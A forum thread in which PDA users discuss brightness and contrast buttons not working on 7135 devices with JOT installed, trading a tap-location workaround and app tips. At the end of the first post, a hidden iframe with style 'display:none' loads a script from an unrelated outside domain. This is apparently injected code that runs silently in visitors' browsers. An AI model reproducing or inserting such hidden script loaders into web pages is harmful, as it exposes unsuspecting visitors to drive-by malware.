+ Reply to Thread

Brightness/Contrast Buttons & JOT

I have noticed several threads regarding problems with the brightness and contrast buttons on 7135's with JOT installed.

On my 7135, the brightness button has not been a problem. The contrast button did not work. However, I have found that if I tap on the graffiti pad about 0.5mm 45 degrees to the upper right from the contrast button, the contrast control screen appears. This would be just barely on the outside (almost on top of) the white border line around the graffiti pad.

In a related matter, I have also noticed that these buttons are more responsive now that I have installed Energy Dimmer 2.2 beta 6. Even when I found the exact spot , I had to tap pretty hard to make the contrast button work. Now it works with a gental touch.

Since these JOT problems have been passing through several threads, I thought this might help to centralize the discussion for these problems.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Krazman - "IT MAY BE THAT YOUR PURPOSE IN LIFE IS TO SERVE AS A WARNING TO OTHERS"

Great info, I didn't know of the access to the Contrast by clicking right on the line! It worked for me! I love Jot, Dimmer and Once in a blue moom time I need to play with my contrast but since I use Jot, I've been dealing with it by going through the PDA Prefs.

thanks for the info.

Yeah, I'm sure it has been stated by now, but since JOT supposedly has RecoEcho in it, the contrst and brightness shortcuts don't work. Can you live without JOT/RecoEcho? If not, please flood CIC with emails begging them to make the apps compatible with the 7135. I know I will be.
    ~'kito
    pdaPhoneHome Moderator